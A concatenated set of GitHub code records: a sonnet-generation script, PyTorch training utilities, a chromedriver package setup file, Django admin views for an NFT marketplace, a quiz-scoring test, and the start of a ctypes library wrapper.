final_syls_counter(dict_verses_apoc)\n\n\n src_dir_cities = \"02_sonetos_by_city\"\n os.system(\"rm -r \" + src_dir_cities)\n os.system(\"mkdir \" + src_dir_cities)\n os.system(\"bash setup.bash\")\n\n for city in os.listdir(src_dir_cities):\n if os.path.isdir(src_dir_cities+\"/\"+city):\n\n try:\n filename_verses_city = \"00_versos_by_city/\"+city+\"/00_versos_predicted_\"+city\n filename_syls_city = \"01_terminaciones_by_city/\"+city+\"/01_terminaciones_\"+city\n\n text_syls_city = read_source(filename_syls_city)\n final_syls_city = final_syls_to_array(text_syls_city)\n dict_verses_city = verses_by_final_syls(filename_verses_city, final_syls_city)\n counter_syls_city = final_syls_counter(dict_verses_city)\n\n create_sonnets(dict_verses, dict_verses_city, dict_verses_apoc, city, src_dir_cities)\n except:\n print (\"ERROR: Sonnets don't created to city: \"+city)\n\n else:\n print (\"ERROR: No dictories found.\")\n\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tenaza/NLP-sonnets_vR_3","sub_path":"sonnets/02_obtener_sonetos.py","file_name":"02_obtener_sonetos.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17596996787","text":"import logging\nimport os\nimport shutil\nfrom collections import OrderedDict\n\nimport torch\nfrom torch import distributed as dist\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom torch.autograd import Variable\nimport numpy as np\nimport random\nimport math\nimport warnings\n\n\ndef reduce_tensor(tensor, n):\n rt = tensor.clone()\n dist.all_reduce(rt, op=dist.ReduceOp.SUM)\n rt /= n\n return rt\n\n\ndef create_loss_fn(args):\n if args.label_smoothing > 0:\n criterion = SmoothCrossEntropy(alpha=args.label_smoothing)\n else:\n criterion = nn.CrossEntropyLoss()\n return criterion.to(args.device)\n\n\ndef module_load_state_dict(model, state_dict):\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_state_dict[name] = v\n model.load_state_dict(new_state_dict)\n\n\ndef model_load_state_dict(model, state_dict):\n try:\n model.load_state_dict(state_dict)\n except:\n module_load_state_dict(model, state_dict)\n\n\ndef save_checkpoint(args, state, is_best, finetune=False):\n os.makedirs(args.save_path, exist_ok=True)\n if finetune:\n name = f'{args.name}_finetune'\n else:\n name = args.name\n filename = f'{args.save_path}/{name}_last.pth.tar'\n torch.save(state, filename, _use_new_zipfile_serialization=False)\n if is_best:\n shutil.copyfile(filename, f'{args.save_path}/{args.name}_best.pth.tar')\n\n\ndef accuracy(output, target, topk=(1,)):\n output = output.to(torch.device('cpu'))\n target = target.to(torch.device('cpu'))\n maxk = max(topk)\n batch_size = target.shape[0]\n\n _, idx = output.sort(dim=1, descending=True)\n pred = idx.narrow(1, 0, maxk).t()\n correct = pred.eq(target.reshape(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].reshape(-1).float().sum(dim=0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nclass SmoothCrossEntropy(nn.Module):\n def __init__(self, alpha=0.1):\n super(SmoothCrossEntropy, self).__init__()\n self.alpha = alpha\n\n def forward(self, logits, labels):\n num_classes = logits.shape[-1]\n alpha_div_k = self.alpha / num_classes\n target_probs = F.one_hot(labels.type(torch.int64), num_classes=num_classes).float() * \\\n (1. - self.alpha) + alpha_div_k\n loss = -(target_probs * torch.log_softmax(logits, dim=-1)).sum(dim=-1)\n return loss.mean()\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\n Imported from https://github.com/pytorch/examples/blob/master/imagenet/main.py#L247-L262\n \"\"\"\n\n def __init__(self, name='None', fmt=':f'):\n self.name = name\n self.fmt = fmt\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n def __str__(self):\n fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'\n return fmtstr.format(**self.__dict__)\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n\ndef get_cosine_schedule_with_warmup(optimizer,\n num_warmup_steps,\n num_training_steps,\n num_wait_steps=0,\n num_cycles=0.5,\n last_epoch=-1):\n def lr_lambda(current_step):\n if current_step < num_wait_steps:\n return 0.0\n\n if current_step < num_warmup_steps + num_wait_steps:\n return float(current_step) / float(max(1, num_warmup_steps + num_wait_steps))\n\n progress = float(current_step - num_warmup_steps - num_wait_steps) / \\\n float(max(1, num_training_steps - num_warmup_steps - num_wait_steps))\n return max(0.0, 0.5 * (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress)))\n\n return LambdaLR(optimizer, lr_lambda, last_epoch)\n\ndef get_lr(optimizer):\n return optimizer.param_groups[0]['lr']\n\n\ndef split_weights(net):\n \"\"\"split network weights into to categlories,\n one are weights in conv layer and linear layer,\n others are other learnable paramters(conv bias,\n bn weights, bn bias, linear bias)\n Args:\n net: network architecture\n\n Returns:\n a dictionary of params splite into to categlories\n \"\"\"\n\n decay = []\n no_decay = []\n\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n decay.append(m.weight)\n\n if m.bias is not None:\n no_decay.append(m.bias)\n\n else:\n if hasattr(m, 'weight'):\n no_decay.append(m.weight)\n if hasattr(m, 'bias'):\n no_decay.append(m.bias)\n\n assert len(list(net.parameters())) == len(decay) + len(no_decay)\n\n return [dict(params=decay), dict(params=no_decay, weight_decay=0)]\n\ndef lower_fc(net, lr):\n normal = []\n slower = []\n for k,v in net.named_parameters():\n if 'fc' in k:\n slower.append(v)\n else:\n normal.append(v)\n\n assert len(list(net.parameters())) == len(normal) + len(slower)\n return [dict(params=normal), dict(params=slower, lr=lr/10)]\n\nclass ProgressMeter(object):\n def __init__(self, num_batches, meters, prefix=\"\"):\n self.batch_fmtstr = self._get_batch_fmtstr(num_batches)\n self.meters = meters\n self.prefix = prefix\n\n def display(self, batch):\n entries = [self.prefix + self.batch_fmtstr.format(batch)]\n entries += [str(meter) for meter in self.meters]\n # print('\\t'.join(entries))\n print('\\t'.join(entries))\n\n def _get_batch_fmtstr(self, num_batches):\n num_digits = len(str(num_batches // 1))\n fmt = '{:' + str(num_digits) + 'd}'\n return '[' + fmt + '/' + fmt.format(num_batches) + ']'\n\n\ndef _no_grad_trunc_normal_(tensor, mean, std, a, b):\n # Cut & paste from PyTorch official master until it's in a few official releases - RW\n # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf\n def norm_cdf(x):\n # Computes standard normal cumulative distribution function\n return (1. + math.erf(x / math.sqrt(2.))) / 2.\n\n if (mean < a - 2 * std) or (mean > b + 2 * std):\n warnings.warn(\"mean is more than 2 std from [a, b] in nn.init.trunc_normal_. \"\n \"The distribution of values may be incorrect.\",\n stacklevel=2)\n\n with torch.no_grad():\n # Values are generated by using a truncated uniform distribution and\n # then using the inverse CDF for the normal distribution.\n # Get upper and lower cdf values\n l = norm_cdf((a - mean) / std)\n u = norm_cdf((b - mean) / std)\n\n # Uniformly fill tensor with values from [l, u], then translate to\n # [2l-1, 2u-1].\n tensor.uniform_(2 * l - 1, 2 * u - 1)\n\n # Use inverse cdf transform for normal distribution to get truncated\n # standard normal\n tensor.erfinv_()\n\n # Transform to proper mean, std\n tensor.mul_(std * math.sqrt(2.))\n tensor.add_(mean)\n\n # Clamp to ensure it's in the proper range\n tensor.clamp_(min=a, max=b)\n return tensor\n\n\ndef trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.):\n # type: (Tensor, float, float, float, float) -> Tensor\n return _no_grad_trunc_normal_(tensor, mean, std, a, b)\n\ndef clip_gradients(model, clip):\n norms = []\n for name, p in model.named_parameters():\n if p.grad is not None:\n param_norm = p.grad.data.norm(2)\n norms.append(param_norm.item())\n clip_coef = clip / (param_norm + 1e-6)\n if clip_coef < 1:\n p.grad.data.mul_(clip_coef)\n return norms\n\ndef cancel_gradients_last_layer(epoch, model, freeze_last_layer):\n if epoch >= freeze_last_layer:\n return\n for n, p in model.named_parameters():\n if \"last_layer\" in n:\n p.grad = None\n\ndef cosine_scheduler(base_value, final_value, epochs, niter_per_ep, warmup_epochs=0, start_warmup_value=0):\n warmup_schedule = np.array([])\n warmup_iters = warmup_epochs * niter_per_ep\n if warmup_epochs > 0:\n warmup_schedule = np.linspace(start_warmup_value, base_value, warmup_iters)\n\n iters = np.arange(epochs * niter_per_ep - warmup_iters)\n schedule = final_value + 0.5 * (base_value - final_value) * (1 + np.cos(np.pi * iters / len(iters)))\n\n schedule = np.concatenate((warmup_schedule, schedule))\n assert len(schedule) == epochs * niter_per_ep\n return schedule\n\ndef get_params_groups(model):\n regularized = []\n not_regularized = []\n for name, param in model.named_parameters():\n if not param.requires_grad:\n continue\n # we do not regularize biases nor Norm parameters\n if name.endswith(\".bias\") or len(param.shape) == 1:\n not_regularized.append(param)\n else:\n regularized.append(param)\n return [{'params': regularized}, {'params': not_regularized, 'weight_decay': 0.}]\n\ndef gen_adv(model, x, criterion, indexes,eps):\n x_adv = Variable(x, requires_grad=True).cuda\n adv_feat = model(x_adv, adv=True)\n clean_feat = model(x, adv=True)\n features = torch.cat((clean_feat, adv_feat), 0)\n tmp_loss = criterion(features, indexes)\n tmp_loss.backward()\n # generate adversarial example\n x_adv.data = x_adv.data + (eps * torch.sign(x_adv.grad.data))\n x_adv.grad.data.zero_()\n x_adv.requires_grad = False\n return x_adv\n","repo_name":"tualgfhite/Contrastive-Learning","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32960283632","text":"from setuptools import setup\n\nwith open(\"README.md\", \"r\") as arq:\n readme = arq.read()\n\nsetup(\n name='easy_chromedriver_windows_install',\n version='0.0.2',\n license='MIT License',\n author='Luan Grabher',\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n author_email='luanggcontato@gmail.com',\n keywords='chromedriver selenium webdriver',\n description=u'Download chromedriver easily on Windows',\n packages=['easy_chromedriver_windows_install'],\n install_requires=['requests']\n)","repo_name":"luan-grabher/easy-chromedriver-windows-install","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6562875029","text":"from accounts.models import User\nfrom admin_panel.collection_app.filters import CollectionFilter, CategoryFilter, FavouriteNftFilter, ReportedNftFilter, \\\n nphFilter, nftFilter\nfrom admin_panel.collection_app.forms import CategoryForm\nfrom apis.nft_management.models import Collection, Category, FavouriteNft, ReportedNft, Nft, NftPriceHistory\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.views import View\nfrom django.views.generic import UpdateView, DeleteView, ListView\n\n\n# Create your views here.\nclass ListCollectionView(View):\n \"\"\"\n **ListCollectionView class**\n\n This view used to perform get request on Collection object to view the list of collection object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `render:` list-collection template and collection list\n\n \"\"\"\n message = request.GET.get('message', None)\n collection_list = Collection.objects.all()\n filter_collection = CollectionFilter(request.GET, collection_list)\n collection_list = filter_collection.qs\n p = Paginator(collection_list.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'list_collection.html', {\n 'collection_list': collection_list,\n \"filter\": filter_collection,\n 'obj': obj,\n 'message': message\n })\n\n\nclass SpecificDeleteCollection(View):\n\n def get(self, request, id, col_id):\n nft_obj = Nft.objects.get(id=id)\n nft_obj.delete()\n url = reverse(f'nft_management:detail-collection', kwargs={'id': col_id})\n url += \"?message=Delete-Successfully/\"\n return HttpResponseRedirect(url)\n\n\nclass DetailCollectionView(View):\n\n def get(self, request, id):\n collection_obj = Collection.objects.filter(id=id).first()\n message = request.GET.get('message', None)\n nft_obj = Nft.objects.filter(collection=id)\n myfilter = nftFilter(request.GET, queryset=nft_obj)\n nft_obj = myfilter.qs\n p = Paginator(nft_obj.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'view_collection.html', context={\n 'collection_obj': collection_obj,\n 'nft': nft_obj,\n 'myfilter': myfilter,\n 'obj': obj,\n 'message': message\n })\n\n\nclass DeleteCollectionView(View):\n \"\"\"\n **DeleteCollectionView class**\n\n This view used to perform get request on Collection object to delete the Collection object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render list collection template after soft delete the collection.\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `HttpResponseRedirect:` collection list template\n\n \"\"\"\n collection_object = Collection.objects.get(id=id)\n nft_objects = Nft.objects.filter(collection=id)\n for nft in nft_objects:\n nft.delete()\n collection_object.delete()\n url = reverse('nft_management:list-collection')\n url += \"?message=Delete-Successfully/\"\n return HttpResponseRedirect(url)\n\n\nclass CreateCategoryView(View):\n \"\"\"\n **CreateCategoryView class**\n\n This view used to perform get and post request on Category object to create the Category object\n\n **Parameters**\n\n `View` : django.views\n\n \"\"\"\n\n def post(self, request):\n \"\"\"\n Http get request use to Render create_category template and categories list\n\n **Template:**\n\n `success-template:` admin_site/create-category.html\n\n **Returns:**\n\n ``render`` : `create category template, category list`\n\n \"\"\"\n try:\n name = request.POST.get('name')\n category_obj = Category(name=name, is_active=True)\n category_obj.save()\n url = reverse('nft_management:list-category')\n url += \"?message=Created-Successfully/\"\n return HttpResponseRedirect(url)\n except Exception as e:\n url = reverse('nft_management:list-category')\n url += \"?message=Already-Exist/\"\n return HttpResponseRedirect(url)\n\n\nclass ListCategoryView(View):\n \"\"\"\n **ListCategoryView class**\n\n This view used to perform get request on category object to view the list of categories object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_category template and category list\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `render:` list-category template and category list\n\n \"\"\"\n message = request.GET.get('message', None)\n print(message)\n category_list = Category.objects.filter(is_removed=False)\n filter_category = CategoryFilter(request.GET, category_list)\n category_list = filter_category.qs\n p = Paginator(category_list.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'list_category.html', {\n 'category_list': category_list,\n \"filter\": filter_category,\n 'obj': obj,\n 'message': message\n })\n\n\nclass DeleteCategoryView(View):\n \"\"\"\n **DeleteCategoryView class**\n\n This view used to perform get request on Category object to delete the Category object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render list category template after soft delete the category.\n\n **Template:**\n\n `template:` admin_site/list-category.html\n\n **Returns:**\n\n `HttpResponseRedirect:` category list template\n\n \"\"\"\n category_object = Category.objects.get(id=id)\n category_object.delete()\n url = reverse('nft_management:list-category')\n url += \"?message=Delete-Successfully/\"\n return HttpResponseRedirect(url)\n\n\nclass UpdateCategoryView(View):\n \"\"\"\n *UpdateCategoryView class*\n\n This view used to perform get and post request on Category object to update the Collection object\n\n *Parameters*\n\n `View:` django.views\n\n \"\"\"\n\n def post(self, request, id):\n \"\"\"\n Http post request use to Update an individual Collection object.\n\n *Template:*\n\n `success-template:` collection_app/list-collection.html\n\n `un-success-template:` collection_app/update-collection.html\n\n *Returns:*\n\n `HttpResponseRedirect` : 'if form is valid'\n\n `else` : render 'update collection template and objects used in collection creation'\n \"\"\"\n try:\n category_object = Category.objects.get(pk=id)\n category_object.name = request.POST.get('name')\n is_active = False\n if request.POST.get('is_active_2'):\n is_active = True\n category_object.is_active = is_active\n category_object.save()\n url = reverse('nft_management:list-category')\n url += \"?message=Updated-Successfully/\"\n return HttpResponseRedirect(url)\n except Exception as e:\n url = reverse('nft_management:list-category')\n url += \"?message=Already-Exist/\"\n return HttpResponseRedirect(url)\n\n\nclass ListFavoritesNFTView(View):\n \"\"\"\n **ListCollectionView class**\n\n This view used to perform get request on Collection object\n to view the list of collection object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `render:` list-collection template and collection list\n\n \"\"\"\n favorites_nft_list = FavouriteNft.objects.all()\n filter_favorites_nft = FavouriteNftFilter(request.GET, favorites_nft_list)\n favorites_nft_list = filter_favorites_nft.qs\n p = Paginator(favorites_nft_list.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'list_favorites_nft.html', {\n 'favorites_nft_list': favorites_nft_list,\n \"filter\": filter_favorites_nft,\n 'obj': obj\n })\n\n\nclass DeleteFavoritesNFTView(View):\n \"\"\"\n **DeleteCategoryView class**\n\n This view used to perform get request on Category object to delete the Category object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render list category template after soft delete the category.\n\n **Template:**\n\n `template:` admin_site/list-category.html\n\n **Returns:**\n\n `HttpResponseRedirect:` category list template\n\n \"\"\"\n favorites_nft_object = FavouriteNft.objects.get(id=id)\n favorites_nft_object.is_removed = True\n favorites_nft_object.save()\n url = reverse('nft_management:list-favorites-nft')\n return HttpResponseRedirect(url)\n\n\nclass ListReportedNFTView(View):\n \"\"\"\n **ListCollectionView class**\n\n This view used to perform get request on Collection object\n to view the list of collection object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n **Template:**\n\n `template:` admin_site/list-collection.html\n\n **Returns:**\n\n `render:` list-collection template and collection list\n\n \"\"\"\n reported_nft_list = ReportedNft.objects.all()\n filter_reported_nft = ReportedNftFilter(request.GET, reported_nft_list)\n reported_nft_list = filter_reported_nft.qs\n p = Paginator(reported_nft_list.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n\n return render(request, 'list_reported_nft.html', {\n 'reported_nft_list': reported_nft_list,\n \"filter\": filter_reported_nft,\n 'obj': obj,\n })\n\n\nclass ResolveReportedNFTView(View):\n \"\"\"\n **DeleteCategoryView class**\n\n This view used to perform get request on Category object to delete the Category object\n\n **Parameters**\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render list category template after soft delete the category.\n\n **Template:**\n\n `template:` admin_site/list-category.html\n\n **Returns:**\n\n `HttpResponseRedirect:` category list template\n\n \"\"\"\n reported_nft_object = ReportedNft.objects.get(id=id)\n reported_nft_object.delete()\n messages.success(request,'Reported Nft : Resolved Successfully')\n url = reverse('nft_management:list-reported-nft')\n\n return HttpResponseRedirect(url)\n\n\nclass NftListDisplay(View):\n model = Nft\n template_name = \"nft-list.html\"\n\n # template_name += \"?message=Delete-Successfully/\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n *Template:*\n\n\n `template:` collection_app/list-collection.html\n\n *Returns:*\n\n\n `render:` list-collection template and collection list\n\n \"\"\"\n message = request.GET.get('message', None)\n\n nfts = Nft.objects.all().order_by('id')\n myfilter = nftFilter(request.GET, queryset=nfts)\n nftis = myfilter.qs\n p = Paginator(nftis.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'nft-list.html', {'nftis': nftis, 'myfilter': myfilter, 'obj': obj, 'message': message})\n\n\nclass NftUpdate(UpdateView):\n model = Nft\n fields = \"__all__\"\n template_name = \"update_nft.html\"\n\n def get_context_data(self, **kwargs):\n collection_obj = Collection.objects.all()\n user_obj = User.objects.all()\n context = super().get_context_data(**kwargs)\n context[\"collection_obj\"] = collection_obj\n context[\"user_obj\"] = user_obj\n\n return context\n\n\nclass NftCreate(View):\n model = Nft\n fields = \"__all__\"\n template_name = \"create_nft.html\"\n\n def get(self, request):\n collection_obj = Collection.objects.all()\n user_obj = User.objects.all()\n nft_obj = Nft.objects.all()\n context = {\n \"collection_obj\": collection_obj,\n \"user_obj\": user_obj,\n \"nft_obj\": nft_obj,\n }\n return render(request, \"create_nft.html\", context)\n\n def post(self, request):\n data = request.POST\n name = data[\"name\"]\n description = data[\"description\"]\n image = data[\"image\"]\n royalty = data[\"royalty\"]\n size = data[\"size\"]\n no_of_copies = data[\"no_of_copies\"]\n total_views = data[\"total_views\"]\n sale_type = data[\"sale_type\"]\n price = data[\"price\"]\n collection = Collection.objects.get(id=int(data[\"collection\"]))\n owner = User.objects.get(id=int(data[\"owner\"]))\n\n nft = Nft(\n name=name,\n description=description,\n image=image,\n royalty=royalty,\n size=size,\n no_of_copies=no_of_copies,\n is_hidden=True,\n collection=collection,\n owner=owner,\n sale_type=sale_type,\n price=price,\n )\n nft.save()\n return redirect(\"nft_management:nfts_list\")\n\n\nclass NftDelete(View):\n \"\"\"\n *DeleteCategoryView class*\n\n This view used to perform get request on Category object to delete the Category object\n\n *Parameters*\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request, pk):\n \"\"\"\n Http get request use to Render list category template after soft delete the category.\n\n *Template:*\n\n `template:` admin_site/list-category.html\n\n *Returns:*\n\n `HttpResponseRedirect:` category list template\n\n \"\"\"\n nft_object = Nft.objects.get(pk=pk)\n # nft_object.is_removed = True\n # nft_object.save()\n nft_object.delete()\n url = reverse('nft_management:nfts_list')\n url += \"?message=Delete-Successfully/\"\n\n return HttpResponseRedirect(url)\n\n\nclass AddNftPriceHistory(View):\n model = NftPriceHistory\n templated_name = \"nftprice_add.html\"\n fields = \"__all__\"\n\n def get(self, request):\n nft_obj = Nft.objects.all()\n context = {\"nft_obj\": nft_obj}\n return render(request, \"nftprice_add.html\", context)\n\n def post(self, request):\n data = request.POST\n price = data[\"price\"]\n is_active = request.POST.get(\"is_active\", False)\n date = data[\"date\"]\n nft = Nft.objects.get(id=int(data[\"nft\"]))\n nft = Nft(is_active=is_active, nft=nft, date=date, price=price)\n nft.save()\n return HttpResponseRedirect(\"nft_management:price-history-list\")\n\n\nclass DeletePriceHistory(DeleteView):\n model = NftPriceHistory\n template_name = \"nftprice_delete.html\"\n fields = \"__all__\"\n success_url = reverse_lazy(\"nft_management:price-history-list\")\n\n\nclass PriceHistoryList(ListView):\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n *Template:*\n\n\n `template:` collection_app/list-collection.html\n\n *Returns:*\n\n\n `render:` list-collection template and collection list\n\n \"\"\"\n nfts = NftPriceHistory.objects.all().order_by('id')\n myfilter = nphFilter(request.GET, queryset=nfts)\n npriceh = myfilter.qs\n p = Paginator(npriceh.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'nftprice_list.html', {'npricehs': npriceh, 'myfilter': myfilter, 'obj': obj})\n\n\nclass UpdateHistoryList(UpdateView):\n model = NftPriceHistory\n templated_name = \"nftprice_list.html\"\n fields = \"__all__\"\n success_url = reverse_lazy(\"nft_management:nfts_list\")\n\n\nclass NftDetailView(View):\n \"\"\"\n *Nft Detail class*\n\n This view used to perform get request on profile object to view the list of Nft\n\n *Parameters*\n\n `View:` django.viewsgit\n\n \"\"\"\n\n def get(self, request, id):\n \"\"\"\n Http get request use to Render profiles template\n\n *Template:*\n\n `template:` admin_user/profiles.html\n\n *Returns:*\n\n `render:` profile template and user list\n\n \"\"\"\n try:\n nft = Nft.objects.get(id=id)\n bids = nft.bidding_nft.all().order_by('id')\n p = Paginator(bids.order_by('id'), 5)\n page = request.GET.get('page',)\n obj = p.get_page(page)\n\n return render(request, 'nft_detail.html', {'nft': nft, 'bids': bids,'obj':obj})\n except Exception as e:\n return \"Nft Doesn not Exist\"\n\n\nclass LiveAuctionView(ListView):\n model = Nft\n fields = \"__all__\"\n template_name = 'live_auction.html'\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n *Template:*\n\n\n `template:` collection_app/list-collection.html\n\n *Returns:*\n\n\n `render:` list-collection template and collection list\n\n \"\"\"\n nft = Nft.objects.all().order_by('id')\n myfilter = nftFilter(request.GET, queryset=nft)\n nftis = myfilter.qs\n p = Paginator(nftis.order_by('id'), 5)\n page = request.GET.get('page')\n obj = p.get_page(page)\n return render(request, 'live_auction.html', {'nftis': nftis, 'myfilter': myfilter, 'obj': obj})\n\n\nclass ReportedNFTView(View):\n \"\"\"\n *ListCollectionView class*\n\n This view used to perform get request on Collection object\n to view the list of collection object\n\n *Parameters*\n\n `View:` django.views\n\n \"\"\"\n\n def get(self, request):\n \"\"\"\n Http get request use to Render create_collection template, categories and users.\n\n *Template:*\n\n `template:` admin_site/list-collection.html\n\n *Returns:*\n\n `render:` list-collection template and collection list\n\n \"\"\"\n reported_nft_list = ReportedNft.objects.get(id=id)\n return render(request, 'reported_nft_view.html', {\n 'reported_nft_list': reported_nft_list\n })","repo_name":"HaseebBajwa12/NFT-MarketPlace","sub_path":"admin_panel/collection_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14336396748","text":"import pytest\nfrom quiz.utils import score_test_attempt\n\npytestmark = pytest.mark.django_db\n\ndef test_score_quiz_attempt(question_factory, answer_factory, quiz_factory, user_factory):\n quiz = quiz_factory(created_by = user_factory())\n \n q1 = question_factory(quiz = quiz)\n q1_correct_answer = answer_factory(question = q1, is_correct = True)\n \n q2 = question_factory(quiz = quiz)\n q2_correct_answer = answer_factory(question = q2, is_correct = True)\n \n q3 = question_factory(quiz = quiz)\n q3_correct_answer = answer_factory(question = q3, is_correct = True)\n \n q4 = question_factory(quiz = quiz)\n q4_correct_answer = answer_factory(question = q4, is_correct = True)\n \n random_answers = answer_factory.create_batch(5, question=q1)\n data ={\n \"submissions\":\n [\n {\n \"question\": q1,\n \"answer\":random_answers[0]\n },\n {\n \"question\": q2,\n \"answer\": random_answers[0]\n },\n {\n \"question\": q3,\n \"answer\": q3_correct_answer\n },\n {\n \"question\": q4,\n \"answer\": q4_correct_answer\n }\n ]\n }\n \n result: dict = score_test_attempt(4, data) \n assert result.get('score') == 2\n assert result.get('score_percent') == 50.0\n assert result.get('total_question') == 4\n ","repo_name":"ridwanray/LMS-Django","sub_path":"app/quiz/tests/test_quiz_utils.py","file_name":"test_quiz_utils.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72545931362","text":"from collections import OrderedDict\nfrom collections.abc import Sequence\nimport ctypes\nimport os.path\n\n\nimport numpy as np\n\nfrom ._kernels import get_kernel\nfrom ._kernels_cy import _verify_bin_edges\n\n# get the directory of the current file \n_dir_of_cur_file = os.path.dirname(os.path.abspath(__file__))\n# get the expected location of the shared library\n_lib_path = os.path.join(_dir_of_cur_file, '../src/libvsf.so')\n\n# confirm that the shared library exists\nif not os.path.isfile(_lib_path):\n raise RuntimeError(f\"libvsf.so wasn't found at: '{_lib_path}'\")\n\n# now actually load in the shared library\n_lib = ctypes.CDLL(_lib_path)\n\n_double_ptr = ctypes.POINTER(ctypes.c_double)\n\nclass POINTPROPS(ctypes.Structure):\n _fields_ = [(\"positions\", _double_ptr),\n (\"velocities\", _double_ptr),\n (\"n_points\", ctypes.c_size_t),\n (\"n_spatial_dims\", ctypes.c_size_t),\n (\"spatial_dim_stride\", ctypes.c_size_t),\n ]\n\n @staticmethod\n def construct(pos, vel, dtype = np.float64, allow_null_pair = False):\n if allow_null_pair and (pos is None) and (vel is None):\n return POINTPROPS(None, None, n_points = 0, n_spatial_dims = 0,\n spatial_dim_stride = 0)\n elif (pos is None) or (vel is None):\n raise ValueError(\"pos and vel must not be None\")\n\n pos_arr = np.asarray(pos, dtype = dtype, order = 'C')\n vel_arr = np.asarray(vel, dtype = dtype, order = 'C')\n assert pos_arr.ndim == 2\n assert vel_arr.ndim == 2\n\n # I believe this is a redundant check:\n assert pos_arr.strides[1] == pos_arr.itemsize\n assert vel_arr.strides[1] == vel_arr.itemsize\n\n assert pos_arr.shape == vel_arr.shape\n n_spatial_dims = int(pos_arr.shape[0])\n n_points = int(pos_arr.shape[1])\n\n # in the future, consider relaxing the following condition (to\n # facillitate better data alignment)\n assert pos_arr.strides[0] == (n_points * pos_arr.itemsize)\n assert vel_arr.strides[0] == (n_points * vel_arr.itemsize)\n spatial_dim_stride = int(n_points)\n\n return POINTPROPS(positions = pos_arr.ctypes.data_as(_double_ptr),\n velocities = vel_arr.ctypes.data_as(_double_ptr),\n n_points = n_points,\n n_spatial_dims = n_spatial_dims,\n spatial_dim_stride = spatial_dim_stride)\n\nclass STATLISTITEM(ctypes.Structure):\n _fields_ = [(\"statistic\", ctypes.c_char_p),\n (\"arg_ptr\", ctypes.c_void_p)]\n\n_STATLISTITEM_ptr = ctypes.POINTER(STATLISTITEM)\n\nclass StatList:\n MAX_CAPACITY = 4\n STATLISTITEM_ArrayType = STATLISTITEM * 4\n\n def __init__(self):\n self.capacity = self.MAX_CAPACITY\n self.length = 0\n self._data = self.STATLISTITEM_ArrayType()\n for i in range(self.capacity):\n self._data[i].statistic = ctypes.c_char_p(None)\n self._data[i].arg_ptr = 